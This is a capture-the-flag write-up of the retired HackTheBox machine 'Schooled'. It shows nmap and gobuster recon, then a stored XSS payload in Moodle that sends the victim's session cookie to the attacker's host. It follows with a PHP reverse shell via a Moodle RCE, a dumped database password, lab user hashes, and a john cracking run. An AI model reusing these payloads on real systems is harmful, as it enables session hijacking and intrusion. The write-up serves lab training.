[HTB Writeup]: Schooled - HackTHeBox Machine
Table of Contents
Info⌗
Box | Name |
---|---|
IP | 10.10.10.234 |
OS | FreeBSD |
Pwned | True |
Vulnerability | Stored XSS/Session Hijack/Priv Esc/RCE |
Priv-esc | Sudo NOPASSWD for pkg install |
Obtained | N/A |
Retired | TRUE |
Recon⌗
The box schooled
is rated as a medium box. It’s based on the FreeBSD 13 and features two vhosts. One with a static website and other one with moodle
version 3.9.0-beta.
Nmap⌗
Basic nmap scan reveals only three services. But before we begin, let’s put the schooled.htb
in /etc/hosts
.
╰─○ sudo nmap -Pn -sC -sV -p- --script-timeout 30 schooled.htb -oA tcp_schooled -vv
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-30 19:24 CEST
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:24
Completed NSE at 19:24, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:24
Completed NSE at 19:24, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:24
Completed NSE at 19:24, 0.00s elapsed
Initiating SYN Stealth Scan at 19:24
Scanning schooled.htb (10.10.10.234) [65535 ports]
Discovered open port 22/tcp on 10.10.10.234
Discovered open port 80/tcp on 10.10.10.234
Increasing send delay for 10.10.10.234 from 0 to 5 due to max_successful_tryno increase to 4
SYN Stealth Scan Timing: About 8.04% done; ETC: 19:31 (0:05:54 remaining)
SYN Stealth Scan Timing: About 15.46% done; ETC: 19:31 (0:05:34 remaining)
Discovered open port 33060/tcp on 10.10.10.234
SYN Stealth Scan Timing: About 21.49% done; ETC: 19:32 (0:05:54 remaining)
SYN Stealth Scan Timing: About 42.49% done; ETC: 19:34 (0:05:30 remaining)
Increasing send delay for 10.10.10.234 from 5 to 10 due to max_successful_tryno increase to 5
Increasing send delay for 10.10.10.234 from 10 to 20 due to max_successful_tryno increase to 6
Increasing send delay for 10.10.10.234 from 20 to 40 due to 103 out of 341 dropped probes since last increase.
SYN Stealth Scan Timing: About 48.15% done; ETC: 19:36 (0:06:00 remaining)
SYN Stealth Scan Timing: About 51.20% done; ETC: 19:38 (0:06:35 remaining)
Stats: 0:11:44 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 62.02% done; ETC: 19:43 (0:07:11 remaining)
Stats: 0:13:24 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 65.80% done; ETC: 19:45 (0:06:58 remaining)
Stats: 0:13:24 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 65.82% done; ETC: 19:45 (0:06:57 remaining)
Stats: 0:13:25 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 65.84% done; ETC: 19:45 (0:06:58 remaining)
Stats: 0:13:25 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 65.85% done; ETC: 19:45 (0:06:57 remaining)
Stats: 0:13:25 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 65.86% done; ETC: 19:45 (0:06:57 remaining)
Stats: 0:13:26 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 65.87% done; ETC: 19:45 (0:06:57 remaining)
Stats: 0:13:26 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 65.87% done; ETC: 19:45 (0:06:57 remaining)
SYN Stealth Scan Timing: About 74.32% done; ETC: 19:47 (0:05:56 remaining)
SYN Stealth Scan Timing: About 80.77% done; ETC: 19:49 (0:04:46 remaining)
SYN Stealth Scan Timing: About 86.52% done; ETC: 19:50 (0:03:31 remaining)
SYN Stealth Scan Timing: About 91.95% done; ETC: 19:51 (0:02:11 remaining)
SYN Stealth Scan Timing: About 96.94% done; ETC: 19:52 (0:00:51 remaining)
Completed SYN Stealth Scan at 19:53, 1723.51s elapsed (65535 total ports)
Initiating Service scan at 19:53
Scanning 3 services on schooled.htb (10.10.10.234)
Completed Service scan at 19:53, 14.23s elapsed (3 services on 1 host)
NSE: Script scanning 10.10.10.234.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:53
Completed NSE at 19:53, 1.32s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:53
Completed NSE at 19:53, 0.17s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:53
Completed NSE at 19:53, 0.00s elapsed
Nmap scan report for schooled.htb (10.10.10.234)
Host is up, received user-set (0.038s latency).
Scanned at 2021-06-30 19:24:48 CEST for 1739s
Not shown: 65532 closed ports
Reason: 65532 resets
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.9 (FreeBSD 20200214; protocol 2.0)
| ssh-hostkey:
| 2048 1d:69:83:78:fc:91:f8:19:c8:75:a7:1e:76:45:05:dc (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDGY8PnQ2GFk9RrUQ82xGivlyXZ8k99JFZAFlNqJIftRHSGWL3HsfaO08lnGCrqVxj3235k0L74SJAqWfJs1ykTRipcZpsI5QvwYPyqpisMgH/SdCH1wehZpgaXRwdn52ob9+GxZ6qjqIon0cH0XR1hkNIGdbTt4RRMy+IfynzVuomW2mUi0tnnXU69pcyYNMShND4PqxVDKZHwUyeDIiYVBvnL5P9qEh0Q/t0HKWFHQ8otwWEpL3jnn774RFP9ETtZsJ/xosuhty02yIZuP6vqtbWfVqcqM8v1R3jm/xjXfXxiflGO09KO2aePAbEhNEofb7V/f33dRQDv5mr9ceZ1
| 256 e9:b2:d2:23:9d:cf:0e:63:e0:6d:b9:b1:a6:86:93:38 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBHc4TgrG+CyKqaIsk10XmAhUKULXK6Bq3bHHeJiWuBmdGS1k3Fp60OoVFdDKQj9aihkaUmbJ8fkG6dp07bm8IcM=
| 256 7f:51:88:f7:3c:dd:77:5e:ba:25:4d:4c:09:25:ea:1f (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPWIP8gV7SGQNoODfYq9qg1k3j6ZZg+1L9zIU9FrHPaf
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.46 ((FreeBSD) PHP/7.4.15)
|_http-favicon: Unknown favicon MD5: 460AF0375ECB7C08C3AE0B6E0B82D717
| http-methods:
| Supported Methods: GET POST OPTIONS HEAD TRACE
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.46 (FreeBSD) PHP/7.4.15
|_http-title: Schooled - A new kind of educational institute
33060/tcp open mysqlx? syn-ack ttl 63
| fingerprint-strings:
| DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp:
| Invalid message"
| HY000
| LDAPBindReq:
| *Parse error unserializing protobuf message"
| HY000
| oracle-tns:
| Invalid message-frame."
|_ HY000
1 ser vice unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port33060-TCP:V=7.91%I=7%D=6/30%Time=60DCAFA1%P=x86_64-pc-linux-gnu%r(N
SF:ULL,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(GenericLines,9,"\x05\0\0\0\x0b\
SF:x08\x05\x1a\0")%r(GetRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(HTTPOp
SF:tions,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(RTSPRequest,9,"\x05\0\0\0\x0b
SF:\x08\x05\x1a\0")%r(RPCCheck,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(DNSVers
SF:ionBindReqTCP,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(DNSStatusRequestTCP,2
SF:B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fI
SF:nvalid\x20message\"\x05HY000")%r(Help,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")
SF:%r(SSLSessionReq,2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01
SF:\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY000")%r(TerminalServerCookie
SF:,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(TLSSessionReq,2B,"\x05\0\0\0\x0b\x
SF:08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"
SF:\x05HY000")%r(Kerberos,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(SMBProgNeg,9
SF:,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(X11Probe,2B,"\x05\0\0\0\x0b\x08\x05\
SF:x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY0
SF:00")%r(FourOhFourRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LPDString,
SF:9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LDAPSearchReq,2B,"\x05\0\0\0\x0b\x0
SF:8\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\
SF:x05HY000")%r(LDAPBindReq,46,"\x05\0\0\0\x0b\x08\x05\x1a\x009\0\0\0\x01\
SF:x08\x01\x10\x88'\x1a\*Parse\x20error\x20unserializing\x20protobuf\x20me
SF:ssage\"\x05HY000")%r(SIPOptions,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LAN
SF:Desk-RC,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(TerminalServer,9,"\x05\0\0\
SF:0\x0b\x08\x05\x1a\0")%r(NCP,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(NotesRP
SF:C,2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x
SF:0fInvalid\x20message\"\x05HY000")%r(JavaRMI,9,"\x05\0\0\0\x0b\x08\x05\x
SF:1a\0")%r(WMSRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(oracle-tns,32,"
SF:\x05\0\0\0\x0b\x08\x05\x1a\0%\0\0\0\x01\x08\x01\x10\x88'\x1a\x16Invalid
SF:\x20message-frame\.\"\x05HY000")%r(ms-sql-s,9,"\x05\0\0\0\x0b\x08\x05\x
SF:1a\0")%r(afp,2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10
SF:\x88'\x1a\x0fInvalid\x20message\"\x05HY000");
Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:53
Completed NSE at 19:53, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:53
Completed NSE at 19:53, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:53
Completed NSE at 19:53, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1739.64 seconds
Raw packets sent: 68026 (2.993MB) | Rcvd: 111199 (13.540MB)
Poking around⌗
Three services are available. Two well known an updated http
and a ssh
server. There is also a mysterious 33060
port that is not being recognized by the scanner (multiplied by 10 3306 - default MySQL port
?).
HTTP overview⌗
Putting other services for later, the first one to be tried is of course a HTTP
.
╰─○ curl -ksi http://schooled.htb
HTTP/1.1 200 OK
Date: Wed, 30 Jun 2021 19:43:48 GMT
Server: Apache/2.4.46 (FreeBSD) PHP/7.4.15
Last-Modified: Sat, 19 Dec 2020 17:23:57 GMT
ETag: "510e-5b6d47d6a6540"
Accept-Ranges: bytes
Content-Length: 20750
Content-Type: text/html
<!DOCTYPE html>
<html lang="en">
[...]
The server is Apache 2.4.48
running with PHP 7.4.15
. And the address http://schooled.htb
presents a static website
Further research shows that there is not much info there. Event the contact form /contact.html
is not working properly (there is no such file as contact.php
).
Natural thing to check in this case is to run a fuzzer against vhosts on the target server.
╰─○ gobuster vhost -u http://schooled.htb/ -w /usr/share/dirb/wordlists/common.txt -o subdomains_80_gobuster.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://schooled.htb/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirb/wordlists/common.txt
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/06/30 20:56:57 Starting gobuster in VHOST enumeration mode
===============================================================
Found: @.schooled.htb (Status: 400) [Size: 347]
Found: ~adm.schooled.htb (Status: 400) [Size: 347]
Found: ~admin.schooled.htb (Status: 400) [Size: 347]
Found: ~administrator.schooled.htb (Status: 400) [Size: 347]
Found: ~amanda.schooled.htb (Status: 400) [Size: 347]
Found: ~apache.schooled.htb (Status: 400) [Size: 347]
Found: ~bin.schooled.htb (Status: 400) [Size: 347]
Found: ~ftp.schooled.htb (Status: 400) [Size: 347]
Found: ~guest.schooled.htb (Status: 400) [Size: 347]
Found: ~http.schooled.htb (Status: 400) [Size: 347]
Found: ~nobody.schooled.htb (Status: 400) [Size: 347]
Found: ~logs.schooled.htb (Status: 400) [Size: 347]
Found: ~mail.schooled.htb (Status: 400) [Size: 347]
Found: ~lp.schooled.htb (Status: 400) [Size: 347]
Found: ~log.schooled.htb (Status: 400) [Size: 347]
Found: ~httpd.schooled.htb (Status: 400) [Size: 347]
Found: ~operator.schooled.htb (Status: 400) [Size: 347]
Found: ~root.schooled.htb (Status: 400) [Size: 347]
Found: ~sys.schooled.htb (Status: 400) [Size: 347]
Found: ~sysadm.schooled.htb (Status: 400) [Size: 347]
Found: ~sysadmin.schooled.htb (Status: 400) [Size: 347]
Found: ~test.schooled.htb (Status: 400) [Size: 347]
Found: ~user.schooled.htb (Status: 400) [Size: 347]
Found: ~tmp.schooled.htb (Status: 400) [Size: 347]
Found: ~www.schooled.htb (Status: 400) [Size: 347]
Found: ~webmaster.schooled.htb (Status: 400) [Size: 347]
Found: lost+found.schooled.htb (Status: 400) [Size: 347]
Found: moodle.schooled.htb (Status: 200) [Size: 84]
Given the fact that there is only one return code 200
the moodle
software seems interesting.
There are four courses there and a login page, that might be used to login or register an account. The only one thing checked is the domain of the email address. It should be within the @student.schooled.htb
Unfortunately the student privilege is not enough to do something interesting within the moodle
software. But the newly created student is able to enroll the Maths course.
The message from the lecturer says that he will be checking on the periodically to ensure that all students have filled in the MoodleNet
part of their profile. The MoodleNet
is a social media platform for educators.
Fortunately for us, there is a stored XSS vulnerability in the MoodleNet
field inside students’ profile. This vuln is described here and as the commit shows it’s due to lack of sanitization of the userprofile
field:
diff --git a/admin/tool/moodlenet/classes/profile_manager.php b/admin/tool/moodlenet/classes/profile_manager.php
index f1a922a..49027fd 100644 (file)
--- a/admin/tool/moodlenet/classes/profile_manager.php
+++ b/admin/tool/moodlenet/classes/profile_manager.php
@@ -46,7 +46,7 @@ class profile_manager {
$user = \core_user::get_user($userid, 'moodlenetprofile');
try {
$userprofile = $user->moodlenetprofile ? $user->moodlenetprofile : '';
- return (isset($user)) ? new moodlenet_user_profile($userprofile, $userid) : null;
+ return (isset($user)) ? new moodlenet_user_profile(s($userprofile), $userid) : null;
} catch (\moodle_exception $e) {
// If an exception is thrown, means there isn't a valid profile set. No need to log exception.
return null;
@@ -59,7 +59,7 @@ class profile_manager {
if ($field->get_category_name() == self::get_category_name()
&& $field->inputname == 'profile_field_mnetprofile') {
try {
- return new moodlenet_user_profile($field->display_data(), $userid);
+ return new moodlenet_user_profile(s($field->display_data()), $userid);
} catch (\moodle_exception $e) {
// If an exception is thrown, means there isn't a valid profile set. No need to log exception.
return null;
Given the fact that the lecturer is checking students profiles it’s likely he will trigger the JS payload. This allows us to perform Session hijacking
attack by stealing the MoodleSession
cookie.
In my case the following XSS payload worked in the first try:
<script>new Image().src="http://IP/c.php?c="+document.cookie;</script>
Setting up the listener (I’m using this python server script for logging GET/POST requests)
╰─○ sudo python3 server.py 80
INFO:root:Starting httpd...
INFO:root:GET request,
Path: /c.php?c=MoodleSession=3r6ht858ruacr94qjjlogs992v
Headers:
Host: 10.10.14.7
User-Agent: Mozilla/5.0 (X11; FreeBSD amd64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://moodle.schooled.htb/moodle/user/profile.php?id=28
10.10.10.234 - - [30/Jun/2021 22:35:00] "GET /c.php?c=MoodleSession=3r6ht858ruacr94qjjlogs992v HTTP/1.1" 200 -
the cookie can be obtained. It allows to elevate privileges to teacher
.
Foothold⌗
In moodle
version 3.9.0-Beta
the RCE vulnerability exists. It might be triggered by the manager
role to which the teacher
can be elevated.
There are multiple ways to exploit it, but I’ve gone with the following exploit. This one didn’t work for me and I didn’t bother to fix it.
Used exploit has a downside - it can be triggered once, and then it doesn’t work anymore. So after few attempts to achieve reverse shell connection I gave up with the bash
payloads (didn’t find python[3] either) and decided to change my strategy.
The vulnerability depends on uploading the plugin inside the zip archive. So I’ve changed the payload to the php reverse shell from here and then converted it to the base64 and put it back in the zip archive.
This allowed me to gain control as a www
user
╰─○ sudo nc -nvlp 443
[sudo] password for:
listening on [any] 443 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.234] 37349
FreeBSD Schooled 13.0-BETA3 FreeBSD 13.0-BETA3 #0 releng/13.0-n244525-150b4388d3b: Fri Feb 19 04:04:34 UTC 2021 root@releng1.nyi.freebsd.org:/usr/obj/usr/src/amd64.amd64/sys/GENERIC amd64
8:11PM up 3:36, 0 users, load averages: 0.71, 0.48, 0.43
USER TTY FROM LOGIN@ IDLE WHAT
uid=80(www) gid=80(www) groups=80(www)
sh: can't access tty; job control turned off
On the system there are two users with the /home
directory.
Priv Esc⌗
Vertical priv esc⌗
Information about the database used by the moodle
can be obtained from config.php
file.
$ cat config.php
<?php // Moodle configuration file
unset($CFG);
global $CFG;
$CFG = new stdClass();
$CFG->dbtype = 'mysqli';
$CFG->dblibrary = 'native';
$CFG->dbhost = 'localhost';
$CFG->dbname = 'moodle';
$CFG->dbuser = 'moodle';
$CFG->dbpass = 'PlaybookMaster2020';
$CFG->prefix = 'mdl_';
$CFG->dboptions = array (
'dbpersist' => 0,
'dbport' => 3306,
'dbsocket' => '',
'dbcollation' => 'utf8_unicode_ci',
);
$CFG->wwwroot = 'http://moodle.schooled.htb/moodle';
$CFG->dataroot = '/usr/local/www/apache24/moodledata';
$CFG->admin = 'admin';
$CFG->directorypermissions = 0777;
require_once(__DIR__ . '/lib/setup.php');
// There is no php closing tag in this file,
// it is intentional because it prevents trailing whitespace problems!
To connect to the database the mysql binary will be handy
$ /usr/local/bin/mysql -u moodle -pPlaybookMaster2020
mysql: [Warning] Using a password on the command line interface can be insecure.
use moodle;
show tables;
Tables_in_moodle
[...]
Users are placed inside the mdl_user
.
id auth confirmed policyagreed deleted suspended mnethostid username password idnumber firstname lastname email emailstop icq skype yahoo aim msn phone1 phone2 institution department address city country lang calendartype theme timezone firstaccess lastaccess lastlogin currentlogin lastip secret picture url description descriptionformat mailformat maildigest maildisplay autosubscribe trackforums timecreated timemodified trustbitmask imagealt lastnamephonetic firstnamephonetic middlename alternatename moodlenetprofile
1 manual 1 0 0 0 1 guest $2y$10$u8DkSWjhZnQhBk1a0g1ug.x79uhkx/sa7euU8TI4FX4TCaXK6uQk2 Guest user root@localhost 0 en gregorian 99 0 0 0 0 0 This user is a special user that allows read-only access to some courses. 1 1 02 1 0 0 1608320077 0 NULL NULL NULL NULL NULL NULL
2 manual 1 0 0 0 1 admin $2y$10$3D/gznFHdpV6PXt1cLPhX.ViTgs87DCE5KqphQhGYR5GFbcl4qTiW Jamie Borham jamie@staff.schooled.htb 0 Bournemouth GB en gregorian 99 1608320129 1608729680 1608681411 1608729680 192.168.1.14 0 1 1 00 1 0 0 1608389236 0
3 manual 1 0 0 0 1 bell_oliver89 $2y$10$N0feGGafBvl.g6LNBKXPVOpkvs8y/axSPyXb46HiFP3C9c42dhvgK Oliver Bell bell_oliver89@student.schooled.htb 0 Bournemouth GB en gregorian 99 0 0 0 0 01 1 0 2 1 0 1608320808 1608320808 0
4 manual 1 0 0 0 1 orchid_sheila89 $2y$10$YMsy0e4x4vKq7HxMsDk.OehnmAcc8tFa0lzj5b1Zc8IhqZx03aryC Sheila Orchid orchid_sheila89@student.schooled.htb 0 Bournemouth GB en gregorian 99 0 0 0 0 01 1 0 2 1 0 1608321097 1608321097 0
5 manual 1 0 0 0 1 chard_ellzabeth89 $2y$10$D0Hu9XehYbTxNsf/uZrxXeRp/6pmT1/6A.Q2CZhbR26lCPtf68wUC Elizabeth Chard chard_elizabeth89@student.schooled.htb 0 Bournemouth GB en gregorian 99 0 0 0 0 01 1 0 2 1 0 1608321183 1608321183 0
6 manual 1 0 0 0 1 morris_jake89 $2y$10$UieCKjut2IMiglWqRCkSzerF.8AnR8NtOLFmDUcQa90lair7LndRy Jake Morris morris_jake89@student.schooled.htb 0 Bournemouth GB en gregorian 99 0 0 0 0 01 1 0 2 1 0 1608380798 1608380798 0
7 manual 1 0 0 0 1 heel_james89 $2y$10$sjk.jJKsfnLG4r5rYytMge4sJWj4ZY8xeWRIrepPJ8oWlynRc9Eim James Heel heel_james89@student.schooled.htb 0 Bournemouth GB en gregorian 99 0 0 0 0 01 1 0 2 1 0 1608380861 1608380861 0
8 manual 1 0 0 0 1 nash_michael89 $2y$10$yShrS/zCD1Uoy0JMZPCDB.saWGsPUrPyQZ4eAS50jGZUp8zsqF8tu Michael Nash nash_michael89@student.schooled.htb 0 Bournemouth GB en gregorian 99 0 0 0 0 01 1 0 2 1 0 1608380931 1608380931 0
9 manual 1 0 0 0 1 singh_rakesh89 $2y$10$Yd52KrjMGJwPUeDQRU7wNu6xjTMobTWq3eEzMWeA2KsfAPAcHSUPu Rakesh Singh singh_rakesh89@student.schooled.htb 0 Bournemouth GB en gregorian 99 0 0 0 0 01 1 0 2 1 0 1608381002 1608381002 0
10 manual 1 0 0 0 1 taint_marcus89 $2y$10$kFO4L15Elng2Z2R4cCkbdOHyh5rKwnG4csQ0gWUeu2bJGt4Mxswoa Marcus Taint taint_marcus89@student.schooled.htb 0 Bournemouth GB en gregorian 99 0 0 0 0 01 1 0 2 1 0 1608381073 1608381073 0
11 manual 1 0 0 0 1 walls_shaun89 $2y$10$EDXwQZ9Dp6UNHjAF.ZXY2uKV5NBjNBiLx/WnwHiQ87Dk90yZHf3ga Shaun Walls walls_shaun89@student.schooled.htb 0 Bournemouth GB en gregorian 99 0 0 0 0 01 1 0 2 1 0 1608381128 1608381128 0
12 manual 1 0 0 0 1 smith_john89 $2y$10$YRdwHxfstP0on0Yzd2jkNe/YE/9PDv/YC2aVtC97mz5RZnqsZ/5Em John Smith smith_john89@student.schooled.htb 0 Bournemouth GB en gregorian 99 0 0 0 0 01 1 0 2 1 0 1608381193 1608381193 0
13 manual 1 0 0 0 1 white_jack89 $2y$10$PRy8LErZpSKT7YuSxlWntOWK/5LmSEPYLafDd13Nv36MxlT5yOZqK Jack White white_jack89@student.schooled.htb 0 Bournemouth GB en gregorian 99 0 0 0 0 01 1 0 2 1 0 1608381255 1608381255 0
14 manual 1 0 0 0 1 travis_carl89 $2y$10$VO/MiMUhZGoZmWiY7jQxz.Gu8xeThHXCczYB0nYsZr7J5PZ95gj9S Carl Travis travis_carl89@student.schooled.htb 0 Bournemouth GB en gregorian 99 0 0 0 0 01 1 0 2 1 0 1608381313 1608381313 0
15 manual 1 0 0 0 1 mac_amy89 $2y$10$PgOU/KKquLGxowyzPCUsi.QRTUIrPETU7q1DEDv2Dt.xAjPlTGK3i Amy Mac mac_amy89@student.schooled.htb0 Bournemouth GB en gregorian 99 0 0 0 0 01 1 0 2 1 0 1608381361 1608381361 0
16 manual 1 0 0 0 1 james_boris89 $2y$10$N4hGccQNNM9oWJOm2uy1LuN50EtVcba/1MgsQ9P/hcwErzAYUtzWq Boris James james_boris89@student.schooled.htb 0 Bournemouth GB en gregorian 99 0 0 0 0 01 1 0 2 1 0 1608381410 1608381410 0
17 manual 1 0 0 0 1 pierce_allan $2y$10$ia9fKz9.arKUUBbaGo2FM.b7n/QU1WDAFRafgD6j7uXtzQxLyR3Zy Allan Pierce pierce_allan89@student.schooled.htb 0 Bournemouth GB en gregorian 99 0 0 0 0 01 1 0 2 1 0 1608381478 1608381478 0
18 manual 1 0 0 0 1 henry_william89 $2y$10$qj67d57dL/XzjCgE0qD1i.ION66fK0TgwCFou9yT6jbR7pFRXHmIu William Henry henry_william89@student.schooled.htb 0 Bournemouth GB en gregorian 99 0 0 0 0 01 1 0 2 1 0 1608381530 1608381530 0
19 manual 1 0 0 0 1 harper_zoe89 $2y$10$mnYTPvYjDwQtQuZ9etlFmeiuIqTiYxVYkmruFIh4rWFkC3V1Y0zPy Zoe Harper harper_zoe89@student.schooled.htb 0 Bournemouth GB en gregorian 99 0 0 0 0 01 1 0 2 1 0 1608381592 1608381592 0
20 manual 1 0 0 0 1 wright_travis89 $2y$10$XFE/IKSMPg21lenhEfUoVemf4OrtLEL6w2kLIJdYceOOivRB7wnpm Travis Wright wright_travis89@student.schooled.htb 0 Bournemouth GB en gregorian 99 0 0 0 0 01 1 0 2 1 0 1608381677 1608381677 0
21 manual 1 0 0 0 1 allen_matthew89 $2y$10$kFYnbkwG.vqrorLlAz6hT.p0RqvBwZK2kiHT9v3SHGa8XTCKbwTZq Matthew Allen allen_matthew89@student.schooled.htb 0 Bournemouth GB en gregorian 99 0 0 0 0 01 1 0 2 1 0 1608381732 1608381732 0
22 manual 1 0 0 0 1 sanders_wallis89 $2y$10$br9VzK6V17zJttyB8jK9Tub/1l2h7mgX1E3qcUbLL.GY.JtIBDG5u Wallis Sanders sanders_wallis89@student.schooled.htb 0 Bournemouth GB en gregorian 99 0 0 0 0 01 1 0 2 1 0 1608381797 1608381797 0
23 manual 1 0 0 0 1 higgins_jane $2y$10$n9SrsMwmiU.egHN60RleAOauTK2XShvjsCS0tAR6m54hR1Bba6ni2 Jane Higgins higgins_jane@staff.schooled.htb 0 Bournemouth GB en gregorian 99 0 0 0 0 01 1 0 2 1 0 1608382421 1608382421 0
24 manual 1 0 0 0 1 phillips_manuel $2y$10$ZwxEs65Q0gO8rN8zpVGU2eYDvAoVmWYYEhHBPovIHr8HZGBvEYEYG Manuel Phillips phillips_manuel@staff.schooled.htb 0 Bournemouth GB en gregorian 99 1608681510 1625080530 1625080405 1625080530 127.0.0.1 0 1 1 02 1 0 1608382537 1608681490 0
25 manual 1 0 0 0 1 carter_lianne $2y$10$jw.KgN/SIpG2MAKvW8qdiub67JD7STqIER1VeRvAH4fs/DPF57JZe Lianne Carter carter_lianne@staff.schooled.htb 0 Bournemouth GB en gregorian 99 0 0 0 0 01 1 0 2 1 0 1608382633 1608382633 0
26 email 0 0 0 0 1 parker_dan89 $2y$10$MYvrCS5ykPXX0pjVuCGZOOPxgj.fiQAZXyufW5itreQEc2IB2.OSi Dan Parker parker_dan89@student.schooled.htb 0 Bournemouth GB en gregorian 99 0 0 0 0 6IwNTLYu1F22aFR 0 NULL 1 1 0 2 1 0 160
There are some staff members, and the administrator of this moodle
instance probably is also a user on the box. So I’ve tried to crack $2y$10$3D/gznFHdpV6PXt1cLPhX.ViTgs87DCE5KqphQhGYR5GFbcl4qTiW
hash.
╰─○ john hash.txt -w=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 6 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:21 0,03% (ETA: 16:00:37) 0g/s 284.2p/s 284.2c/s 284.2C/s april20..coolchick
0g 0:00:00:22 0,04% (ETA: 16:02:33) 0g/s 283.0p/s 283.0c/s 283.0C/s sydney1..hotness
!QAZ2wsx (?)
1g 0:00:00:53 DONE (2021-06-30 23:06) 0.01869g/s 260.4p/s 260.4c/s 260.4C/s 110689..kuuipo
Use the "--show" option to display all of the cracked passwords reliably
Using this password I was able to connect using ssh
.
╰─○ ssh jamie@schooled.htb
Password for jamie@Schooled:
Last login: Tue Mar 16 14:44:53 2021 from 10.10.14.5
FreeBSD 13.0-BETA3 (GENERIC) #0 releng/13.0-n244525-150b4388d3b: Fri Feb 19 04:04:34 UTC 2021
Welcome to FreeBSD!
Release Notes, Errata: https://www.FreeBSD.org/releases/
Security Advisories: https://www.FreeBSD.org/security/
FreeBSD Handbook: https://www.FreeBSD.org/handbook/
FreeBSD FAQ: https://www.FreeBSD.org/faq/
Questions List: https://lists.FreeBSD.org/mailman/listinfo/freebsd-questions/
FreeBSD Forums: https://forums.FreeBSD.org/
Documents installed with the system are in the /usr/local/share/doc/freebsd/
directory, or can be installed later with: pkg install en-freebsd-doc
For other languages, replace "en" with a language code like de or fr.
Show the version of FreeBSD installed: freebsd-version ; uname -a
Please include that output and any error messages when posting questions.
Introduction to manual pages: man man
FreeBSD directory layout: man hier
To change this login announcement, see motd(5).
To see the last 10 lines of a long file, use "tail filename". To see the
